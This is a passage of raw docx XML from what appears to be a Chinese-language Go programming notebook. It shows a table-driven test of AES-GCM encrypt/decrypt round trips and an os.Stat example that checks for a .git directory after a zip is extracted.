          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">tt := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">range </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>tests {</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>t.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(tt.name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(t *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>testing</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6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) {</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">cipher := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>EncryptGCM</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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(tt.args.plaintext))</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">plaintext := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>DecryptGCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(cipher)</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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">if </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AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>reflect</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>DeepEqual</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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(tt.args.plaintext)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>plaintext) {</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>t.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Fail</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>})</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t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C68B454" w14:textId="77777777" w:rsidR="00EF1AB8" w:rsidRPr="00EF1AB8" w:rsidRDefault="00EF1AB8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108DF2BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="322" w:name="_Toc159779779"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用标准库和第三方库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="322"/>
    </w:p>
    <w:p w14:paraId="30A5CE32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E41AF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="323" w:name="_Toc159779780"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:bookmarkEnd w:id="323"/>
    </w:p>
    <w:p w14:paraId="40EB8EE2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54257788" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C679172" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os.Stat:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看文件存在不存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C43919C" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例：判断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解压后顶级目录是否还是目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77360DA5" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接收，然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">os.IsNotExist(err) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>os.IsExist(err)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看是不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB67C6F" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>_, err := os.Stat(filepath.Join(ZipDestFileDir, ".git"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D09427" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>var GitPath string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD07050" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">os.IsNotExist(err) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3971863A" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接目录中没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录，进行二层处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53373EC1" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>files, _ := ioutil.ReadDir(ZipDestFileDir)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096F4A3C" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if len(files) == 1 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7F844A" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>_, err := os.Stat(filepath.Join(ZipDestFileDir, files[0].Name(), ".git"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7002CFF7" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F122B4" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if os.IsNotExist(err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD237D" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>GitPath = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D752EA" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A94D969" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B657B64" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>GitPath = filepath.Join(ZipDestFileDir, files[0].Name())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B9AE6" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB22EC9" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB9CEED" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25444852" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47972CAF" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>海林写法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9A0693" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func fileExists(path string) bool {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FAF670" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_, err := os.Stat(path) //os.Stat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>获取文件信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECD1A00" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B60BF" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
